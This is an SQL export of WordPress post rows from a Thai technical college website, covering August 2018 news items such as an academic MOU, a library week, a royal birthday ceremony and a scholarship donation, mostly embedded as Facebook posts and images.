INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3641, 3, '2018-08-10 09:50:17', '2018-08-10 02:50:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'Memorandum of Understanding (MOU) cooperation of academic between Rayong Technical College and Wat Ta-Kien Ngam Community School by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School for learning in Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum professional skills development project and connect to basic education in Entrepreneurship And evaluation subject Also can apply for vocational education study include other subjects On Wednesday 8, 2018 at Rayong Technical College', '', 'inherit', 'closed', 'closed', '', '3637-revision-v1', '', '', '2018-08-10 09:50:17', '2018-08-10 02:50:17', '', 3637, 'http://www.technicrayong.ac.th/3637-revision-v1/', 0, 'revision', '', 0),
(3642, 3, '2018-08-10 10:11:42', '2018-08-10 03:11:42', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.650421052000753&type=3\"><img class=\"aligncenter wp-image-3643 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'โครงการสัปดาห์ห้องสมุด ประจำปีการศึกษา 2561 เพื่อให้นักเรียน นักศึกษารักการอ่าน รู้จักวิธีการสืบค้นข้อมูล หลักการใช้ห้องสมุดได้อย่างถูกต้อง วันพุธที่ 8 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b1%e0%b8%9b%e0%b8%94%e0%b8%b2%e0%b8%ab%e0%b9%8c%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%a1%e0%b8%b8%e0%b8%94', '', '', '2018-08-10 10:49:00', '2018-08-10 03:49:00', '', 0, 'http://www.technicrayong.ac.th/?p=3642', 346, 'post', '', 0),
(3643, 3, '2018-08-10 09:57:42', '2018-08-10 02:57:42', '', '10-8-2561 9-59-57', '', 'inherit', 'closed', 'closed', '', '10-8-2561-9-59-57', '', '', '2018-08-10 09:57:42', '2018-08-10 02:57:42', '', 3642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/10-8-2561-9-59-57.jpg', 0, 'attachment', 'image/jpeg', 0),
(3644, 3, '2018-08-10 10:11:42', '2018-08-10 03:11:42', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.650421052000753&type=3\"><img class=\"aligncenter wp-image-3643 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'โครงการสัปดาห์ห้องสมุด ประจำปีการศึกษา 2561 เพื่อให้นักเรียน นักศึกษารักการอ่าน รู้จักวิธีการสืบค้นข้อมูล หลักการใช้ห้องสมุดได้อย่างถูกต้อง วันพุธที่ 8 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3642-revision-v1', '', '', '2018-08-10 10:11:42', '2018-08-10 03:11:42', '', 3642, 'http://www.technicrayong.ac.th/3642-revision-v1/', 0, 'revision', '', 0),
(3647, 3, '2018-08-10 10:12:14', '2018-08-10 03:12:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'Memorandum of Understanding (MOU) cooperation of academic between Rayong Technical College and Wat Ta-Kien Ngam Community School by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School for learning in Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum professional skills development project and connect to basic education in Entrepreneurship And evaluation subject Also can apply for vocational education study include other subjects On Wednesday 8 August 2018 at Rayong Technical College', '', 'inherit', 'closed', 'closed', '', '3637-revision-v1', '', '', '2018-08-10 10:12:14', '2018-08-10 03:12:14', '', 3637, 'http://www.technicrayong.ac.th/3637-revision-v1/', 0, 'revision', '', 0),
(3648, 3, '2018-08-10 10:18:04', '2018-08-10 03:18:04', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVdmtZTEI62hE2Om~%3BsdEx~_L5PKwSMcUiGWMu4inil~%3B8vF0lnP7fB7DSzJ88V6~_InifiyefNGZMzKL3Z~_KmL9aXDPfeWks7nofzrCLfxVmWeWHVTtLnujhzA9L9OVz~%3BeLdWa8a5358HPzMyW9ef~%3BFaVy9dvvrdVy8U9fP0mNT34Si5fLP19eqHyJffyCdj4~%3B3iR7deXr1Igz75WD~_~_~_~%3BrIJxKY~%3BYb45j8~_JdC33~%3BWbBT3bgzhR~%3BwXjc~_OP38jqreQTgn6dfBLnTb4VyOfGfAl~_Msdv7OOvw3wd~%3BsWb3bzjGfIX9XLokyGsh3zvL9~%3BbfLwfq1cdv9j~_kv2NQ4~_o4XyBk~%3B6LKehJvcsL~%3Biv6MdePQT9OrT53ngL~_0ce~%3Be~%3Bnxfu795v00~_E3vfUwb~_rWkH7xx~%3Bx1uGehJ~%3B~%3Bagng7qucjq~_ajn9OcH7X0fLm8~_f8WMEWOeItfvlCG~_f~_8N~%3BrZ3fuos8Bnqo4F55~%3BGvhh~%3BKOV936NPHv976hf6tze~%3BMXyGrN99Tw~_~_P76~%3ByrZ847wLWJlbBexPug9z3NjcPb~_hTUnzv8EexX~%3B~%3Bm8~_0LYtl45vdAPhfm833f9Gs75ptFv63~%3BlP6LB38Z30~%3BAv2b0z8Tqy3m0rb9Yf7799vlV6QeDHuRbs~%3Bob98Pe773v8lZfo7791t~%3BUIxr5lPx736Oxv3yz~_5r1eudHvSds~_cfW01y~%3B6flN4c8YOz4G~%3BeP85uIP~_8Gd8Y1~_1fXid3~%3BEL583zisPP8Tbu3g1~_E9HDu8~_M943wfuMKNYDnx9~%3B2~%3BcX7~_4b9IiuZj9bP6~_~_K84r7~%3Bxr~%3Betn5s5l~_wvW9~_3nEQ~%3B20dOLN~%3Bwn0UX~_u~_9u37hoKfg~_xtcgnv1bbv3meSC~_7Refe67kL8B2~%3BH3~%3BO2mn~%3Bssnj48H5nt~_82~%3By6If9695X3vf1h1Nf3~%3B9D0lgP~%3Bihnf5o7v18~_6JXU6~%3Bvpv33l~%3BK8G~_z~_M~_wz7Lt8Y92Ht~_eUXR7z3O6zI3~_xHFPxDnHjzke8TnLtyv~_7~%3BL5yXrJ~_bfpbGvnySrI~%3B~_nH6S1cOZX2Lr~%3Bfgk3ttjPRn4oZL9wA~%3B56AdZPdyuv5cK~%3BSa5D7BvSti~%3BAbcyfveXvOB9vH8LYtt9Muy~%3B8N8k553yvY~_el8SYb3AfpdSe139~_~%3Bhnj.bps.a.650421052000753&type=1\"><img class=\"aligncenter wp-image-3649 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'On Wednesday 8th August 2018 at Rayong Technical college, the Library project for the academic year of 2018 took place. This was set up for students to learn how to garner research from books and increase their literacy and love for books.', '', 'publish', 'closed', 'open', '', 'the-week-of-library-project-for-academic-year-of-2018-for-student-to-know-the-right-way-how-to-search-info-of-the-books-for-the-library-and-loving-to-read-on-wednesday-8-august-2018-at-rayong-technic', '', '', '2018-08-15 16:15:34', '2018-08-15 09:15:34', '', 0, 'http://www.technicrayong.ac.th/?p=3648', 345, 'post', '', 0),
(3649, 3, '2018-08-10 10:13:03', '2018-08-10 03:13:03', '', '10-8-2561 9-59-57', '', 'inherit', 'closed', 'closed', '', '10-8-2561-9-59-57-2', '', '', '2018-08-10 10:13:03', '2018-08-10 03:13:03', '', 3648, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3650, 3, '2018-08-10 10:18:04', '2018-08-10 03:18:04', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVdmtZTEI62hE2Om~%3BsdEx~_L5PKwSMcUiGWMu4inil~%3B8vF0lnP7fB7DSzJ88V6~_InifiyefNGZMzKL3Z~_KmL9aXDPfeWks7nofzrCLfxVmWeWHVTtLnujhzA9L9OVz~%3BeLdWa8a5358HPzMyW9ef~%3BFaVy9dvvrdVy8U9fP0mNT34Si5fLP19eqHyJffyCdj4~%3B3iR7deXr1Igz75WD~_~_~_~%3BrIJxKY~%3BYb45j8~_JdC33~%3BWbBT3bgzhR~%3BwXjc~_OP38jqreQTgn6dfBLnTb4VyOfGfAl~_Msdv7OOvw3wd~%3BsWb3bzjGfIX9XLokyGsh3zvL9~%3BbfLwfq1cdv9j~_kv2NQ4~_o4XyBk~%3B6LKehJvcsL~%3Biv6MdePQT9OrT53ngL~_0ce~%3Be~%3Bnxfu795v00~_E3vfUwb~_rWkH7xx~%3Bx1uGehJ~%3B~%3Bagng7qucjq~_ajn9OcH7X0fLm8~_f8WMEWOeItfvlCG~_f~_8N~%3BrZ3fuos8Bnqo4F55~%3BGvhh~%3BKOV936NPHv976hf6tze~%3BMXyGrN99Tw~_~_P76~%3ByrZ847wLWJlbBexPug9z3NjcPb~_hTUnzv8EexX~%3B~%3Bm8~_0LYtl45vdAPhfm833f9Gs75ptFv63~%3BlP6LB38Z30~%3BAv2b0z8Tqy3m0rb9Yf7799vlV6QeDHuRbs~%3Bob98Pe773v8lZfo7791t~%3BUIxr5lPx736Oxv3yz~_5r1eudHvSds~_cfW01y~%3B6flN4c8YOz4G~%3BeP85uIP~_8Gd8Y1~_1fXid3~%3BEL583zisPP8Tbu3g1~_E9HDu8~_M943wfuMKNYDnx9~%3B2~%3BcX7~_4b9IiuZj9bP6~_~_K84r7~%3Bxr~%3Betn5s5l~_wvW9~_3nEQ~%3B20dOLN~%3Bwn0UX~_u~_9u37hoKfg~_xtcgnv1bbv3meSC~_7Refe67kL8B2~%3BH3~%3BO2mn~%3Bssnj48H5nt~_82~%3By6If9695X3vf1h1Nf3~%3B9D0lgP~%3Bihnf5o7v18~_6JXU6~%3Bvpv33l~%3BK8G~_z~_M~_wz7Lt8Y92Ht~_eUXR7z3O6zI3~_xHFPxDnHjzke8TnLtyv~_7~%3BL5yXrJ~_bfpbGvnySrI~%3B~_nH6S1cOZX2Lr~%3Bfgk3ttjPRn4oZL9wA~%3B56AdZPdyuv5cK~%3BSa5D7BvSti~%3BAbcyfveXvOB9vH8LYtt9Muy~%3B8N8k553yvY~_el8SYb3AfpdSe139~_~%3Bhnj.bps.a.650421052000753&type=1\"><img class=\"aligncenter wp-image-3649 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'The Week of Library project for academic year of 2018 for student to know the right way how to search info of the books for the library and loving to read. On Wednesday 8 August 2018 at Rayong Technical college', '', 'inherit', 'closed', 'closed', '', '3648-revision-v1', '', '', '2018-08-10 10:18:04', '2018-08-10 03:18:04', '', 3648, 'http://www.technicrayong.ac.th/3648-revision-v1/', 0, 'revision', '', 0),
(3652, 3, '2018-08-10 10:38:01', '2018-08-10 03:38:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมบันทึกความเข้าใจ(MOU)ความร่วมมือทางวิชาการ ระหว่างวิทยาลัยเทคนิคระยอง กับ โรงเรียนชุมชนวัดตะเคียนงาม นำโดยนางอัญชลี สารสุวรรณ์ ผู้อำนวยการโรงเรียนชุมชนวัดตะเคียนงาม บุคลากรทางการศึกษา ในการศึกษาโครงการพัฒนาหลักสูตรทักษะอาชีพเครื่องสำอางสมุนไพรใบขลู่ต่อเนื่องเชื่อมโยงการศึกษาขั้นพื้นฐาน ในวิชาการเป็นผู้ประกอบการ และประเมินผลการเรียนและนำไปใช้ในการเรียนสายอาชีวศึกษา รวมทั้งวิชาอื่น ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 8 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3633-autosave-v1', '', '', '2018-08-10 10:38:01', '2018-08-10 03:38:01', '', 3633, 'http://www.technicrayong.ac.th/3633-autosave-v1/', 0, 'revision', '', 0),
(3654, 3, '2018-08-10 10:39:02', '2018-08-10 03:39:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 8 August 2018, The Memorandum of Understanding (MOU) a cooperation of academic studies between Rayong Technical College and Wat Ta-Kien Ngam Community School was reached by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School and learned about Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum, professional skills development project, and basic education in Entrepreneurship.', '', 'inherit', 'closed', 'closed', '', '3637-revision-v1', '', '', '2018-08-10 10:39:02', '2018-08-10 03:39:02', '', 3637, 'http://www.technicrayong.ac.th/3637-revision-v1/', 0, 'revision', '', 0),
(3655, 3, '2018-08-10 10:39:29', '2018-08-10 03:39:29', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVdmtZTEI62hE2Om~%3BsdEx~_L5PKwSMcUiGWMu4inil~%3B8vF0lnP7fB7DSzJ88V6~_InifiyefNGZMzKL3Z~_KmL9aXDPfeWks7nofzrCLfxVmWeWHVTtLnujhzA9L9OVz~%3BeLdWa8a5358HPzMyW9ef~%3BFaVy9dvvrdVy8U9fP0mNT34Si5fLP19eqHyJffyCdj4~%3B3iR7deXr1Igz75WD~_~_~_~%3BrIJxKY~%3BYb45j8~_JdC33~%3BWbBT3bgzhR~%3BwXjc~_OP38jqreQTgn6dfBLnTb4VyOfGfAl~_Msdv7OOvw3wd~%3BsWb3bzjGfIX9XLokyGsh3zvL9~%3BbfLwfq1cdv9j~_kv2NQ4~_o4XyBk~%3B6LKehJvcsL~%3Biv6MdePQT9OrT53ngL~_0ce~%3Be~%3Bnxfu795v00~_E3vfUwb~_rWkH7xx~%3Bx1uGehJ~%3B~%3Bagng7qucjq~_ajn9OcH7X0fLm8~_f8WMEWOeItfvlCG~_f~_8N~%3BrZ3fuos8Bnqo4F55~%3BGvhh~%3BKOV936NPHv976hf6tze~%3BMXyGrN99Tw~_~_P76~%3ByrZ847wLWJlbBexPug9z3NjcPb~_hTUnzv8EexX~%3B~%3Bm8~_0LYtl45vdAPhfm833f9Gs75ptFv63~%3BlP6LB38Z30~%3BAv2b0z8Tqy3m0rb9Yf7799vlV6QeDHuRbs~%3Bob98Pe773v8lZfo7791t~%3BUIxr5lPx736Oxv3yz~_5r1eudHvSds~_cfW01y~%3B6flN4c8YOz4G~%3BeP85uIP~_8Gd8Y1~_1fXid3~%3BEL583zisPP8Tbu3g1~_E9HDu8~_M943wfuMKNYDnx9~%3B2~%3BcX7~_4b9IiuZj9bP6~_~_K84r7~%3Bxr~%3Betn5s5l~_wvW9~_3nEQ~%3B20dOLN~%3Bwn0UX~_u~_9u37hoKfg~_xtcgnv1bbv3meSC~_7Refe67kL8B2~%3BH3~%3BO2mn~%3Bssnj48H5nt~_82~%3By6If9695X3vf1h1Nf3~%3B9D0lgP~%3Bihnf5o7v18~_6JXU6~%3Bvpv33l~%3BK8G~_z~_M~_wz7Lt8Y92Ht~_eUXR7z3O6zI3~_xHFPxDnHjzke8TnLtyv~_7~%3BL5yXrJ~_bfpbGvnySrI~%3B~_nH6S1cOZX2Lr~%3Bfgk3ttjPRn4oZL9wA~%3B56AdZPdyuv5cK~%3BSa5D7BvSti~%3BAbcyfveXvOB9vH8LYtt9Muy~%3B8N8k553yvY~_el8SYb3AfpdSe139~_~%3Bhnj.bps.a.650421052000753&type=1\"><img class=\"aligncenter wp-image-3649 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'On Wednesday 8 August 2018 at Rayong Technical college, the Library project for the academic year of 2018 took place. This was set up for students to learn how to garner research from books and increase their literacy and love for books.', '', 'inherit', 'closed', 'closed', '', '3648-revision-v1', '', '', '2018-08-10 10:39:29', '2018-08-10 03:39:29', '', 3648, 'http://www.technicrayong.ac.th/3648-revision-v1/', 0, 'revision', '', 0),
(3657, 3, '2018-08-10 10:48:18', '2018-08-10 03:48:18', '', '38721602_650381032004755_6844780124257124352_o', '', 'inherit', 'closed', 'closed', '', '38721602_650381032004755_6844780124257124352_o', '', '', '2018-08-10 10:48:18', '2018-08-10 03:48:18', '', 3642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38721602_650381032004755_6844780124257124352_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3660, 3, '2018-08-10 10:51:29', '2018-08-10 03:51:29', '', '38721602_650381032004755_6844780124257124352_o', '', 'inherit', 'closed', 'closed', '', '38721602_650381032004755_6844780124257124352_o-3', '', '', '2018-08-10 10:51:29', '2018-08-10 03:51:29', '', 3648, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38721602_650381032004755_6844780124257124352_o-2.jpg', 0, 'attachment', 'image/jpeg', 0),
(3692, 3, '2018-08-14 08:28:45', '2018-08-14 01:28:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๑๐ สิงหาคม ๒๕๖๑ ร่วมถวายพระพรชัยมงคลต่อหน้าพระบรมฉายาลักษณ์ พิธีเฉลิมพระเกียรติสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ ในรัชกาลที่ ๙ เนื่องในวันเฉลิมพระชนมพรรษา ๘๖ พรรษา ๑๒ สิงหาคม ๒๕๖๑ ณ ลานโดมเอนกประสงค์ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%90-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92', '', '', '2018-08-14 08:28:45', '2018-08-14 01:28:45', '', 0, 'http://www.technicrayong.ac.th/?p=3692', 344, 'post', '', 0),
(3693, 3, '2018-08-14 08:28:29', '2018-08-14 01:28:29', '', '38888283_652396778469847_617048704351731712_o', '', 'inherit', 'closed', 'closed', '', '38888283_652396778469847_617048704351731712_o', '', '', '2018-08-14 08:28:29', '2018-08-14 01:28:29', '', 3692, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38888283_652396778469847_617048704351731712_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3694, 3, '2018-08-14 08:28:45', '2018-08-14 01:28:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.652347671808091.1073742186.100010985913485%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๑๐ สิงหาคม ๒๕๖๑ ร่วมถวายพระพรชัยมงคลต่อหน้าพระบรมฉายาลักษณ์ พิธีเฉลิมพระเกียรติสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ ในรัชกาลที่ ๙ เนื่องในวันเฉลิมพระชนมพรรษา ๘๖ พรรษา ๑๒ สิงหาคม ๒๕๖๑ ณ ลานโดมเอนกประสงค์ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3692-revision-v1', '', '', '2018-08-14 08:28:45', '2018-08-14 01:28:45', '', 3692, 'http://www.technicrayong.ac.th/3692-revision-v1/', 0, 'revision', '', 0),
(3696, 3, '2018-08-14 08:31:20', '2018-08-14 01:31:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 วิทยาลัยพาณิชยการอินทราชัย สถาบันการอาชีวศึกษากรุงเทพมหานคร สังกัดสำนักงานคณะกรรมการการอาชีวศึกษา เข้าศึกษาดูงานศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ภายใต้การอบรมเชิงปฏิบัติการตามโครงการพัฒนาศักยภาพนักเรียน นักศึกษา เพื่อเตรียมความพร้อมในการเป็นผู้ประกอบการ (การศึกษาดูงาน) ประจำปีการศึกษา 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-10-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4%e0%b8%97', '', '', '2018-08-14 08:31:20', '2018-08-14 01:31:20', '', 0, 'http://www.technicrayong.ac.th/?p=3696', 343, 'post', '', 0),
(3697, 3, '2018-08-14 08:30:52', '2018-08-14 01:30:52', '', '38872918_652443801798478_1168059099661729792_o', '', 'inherit', 'closed', 'closed', '', '38872918_652443801798478_1168059099661729792_o', '', '', '2018-08-14 08:30:52', '2018-08-14 01:30:52', '', 3696, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38872918_652443801798478_1168059099661729792_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3698, 3, '2018-08-14 08:31:20', '2018-08-14 01:31:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652456421797216%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 วิทยาลัยพาณิชยการอินทราชัย สถาบันการอาชีวศึกษากรุงเทพมหานคร สังกัดสำนักงานคณะกรรมการการอาชีวศึกษา เข้าศึกษาดูงานศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ภายใต้การอบรมเชิงปฏิบัติการตามโครงการพัฒนาศักยภาพนักเรียน นักศึกษา เพื่อเตรียมความพร้อมในการเป็นผู้ประกอบการ (การศึกษาดูงาน) ประจำปีการศึกษา 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3696-revision-v1', '', '', '2018-08-14 08:31:20', '2018-08-14 01:31:20', '', 3696, 'http://www.technicrayong.ac.th/3696-revision-v1/', 0, 'revision', '', 0),
(3699, 3, '2018-08-14 08:33:10', '2018-08-14 01:33:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 คุณวิเชียร แสงวงศ์กิจ บริษัท ส.กิจชัย กรุ๊ป มอบทุนสนับสนุนการศึกษา จำนวน 20,000 บาท ให้แก่นักเรียน นักศึกษา ที่เป็นตัวแทนของวิทยาลัยเทคนิคระยอง ไปแข่งขันกีฬาอาชีวเกมส์ ระดับชาติ ณ บริษัท ส.กิจชัย กรุ๊ป', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-10-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%84%e0%b8%b8%e0%b8%93', '', '', '2018-08-14 08:33:10', '2018-08-14 01:33:10', '', 0, 'http://www.technicrayong.ac.th/?p=3699', 342, 'post', '', 0),
(3701, 3, '2018-08-14 08:32:53', '2018-08-14 01:32:53', '', '38875597_652485838460941_5723877600841957376_o', '', 'inherit', 'closed', 'closed', '', '38875597_652485838460941_5723877600841957376_o', '', '', '2018-08-14 08:32:53', '2018-08-14 01:32:53', '', 3699, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38875597_652485838460941_5723877600841957376_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3702, 3, '2018-08-14 08:33:10', '2018-08-14 01:33:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 10 สิงหาคม 2561 คุณวิเชียร แสงวงศ์กิจ บริษัท ส.กิจชัย กรุ๊ป มอบทุนสนับสนุนการศึกษา จำนวน 20,000 บาท ให้แก่นักเรียน นักศึกษา ที่เป็นตัวแทนของวิทยาลัยเทคนิคระยอง ไปแข่งขันกีฬาอาชีวเกมส์ ระดับชาติ ณ บริษัท ส.กิจชัย กรุ๊ป', '', 'inherit', 'closed', 'closed', '', '3699-revision-v1', '', '', '2018-08-14 08:33:10', '2018-08-14 01:33:10', '', 3699, 'http://www.technicrayong.ac.th/3699-revision-v1/', 0, 'revision', '', 0),
(3705, 3, '2018-08-14 08:37:58', '2018-08-14 01:37:58', '', '14-8-2561 8-40-13', '', 'inherit', 'closed', 'closed', '', '14-8-2561-8-40-13', '', '', '2018-08-14 08:37:58', '2018-08-14 01:37:58', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/14-8-2561-8-40-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(3709, 3, '2018-08-14 10:34:31', '2018-08-14 03:34:31', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n<h2>>หนังสือเรียกร้องค่าสินไหมทดแทนฯ</h2>\r\n<blockquote>หนังสือแนะนำการเบิกประกันอุบัติเหตุ</blockquote>\r\n ', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-revision-v1', '', '', '2018-08-14 10:34:31', '2018-08-14 03:34:31', '', 1792, 'http://www.technicrayong.ac.th/1792-revision-v1/', 0, 'revision', '', 0),
(3711, 3, '2018-08-14 10:37:13', '2018-08-14 03:37:13', '', 'หนังสือแนะนำการเบิกประกันฯ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%99%e0%b8%b0%e0%b8%99%e0%b8%b3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9a%e0%b8%b4%e0%b8%81%e0%b8%9b%e0%b8%a3%e0%b8%b0-3', '', '', '2018-08-14 10:37:13', '2018-08-14 03:37:13', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/หนังสือแนะนำการเบิกประกันฯ-1.pdf', 0, 'attachment', 'application/pdf', 0),
